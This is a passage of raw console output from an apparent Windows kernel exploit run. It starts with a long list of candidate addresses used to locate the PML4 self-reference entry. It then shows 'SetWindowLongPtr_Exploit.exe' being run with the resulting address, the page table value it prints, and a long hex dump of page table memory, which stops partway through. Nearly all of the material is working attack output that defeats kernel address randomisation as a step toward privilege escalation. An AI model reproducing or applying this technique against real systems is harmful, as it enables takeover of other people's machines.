ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n \r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............\r\n000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....\r\n000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....\r\n000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 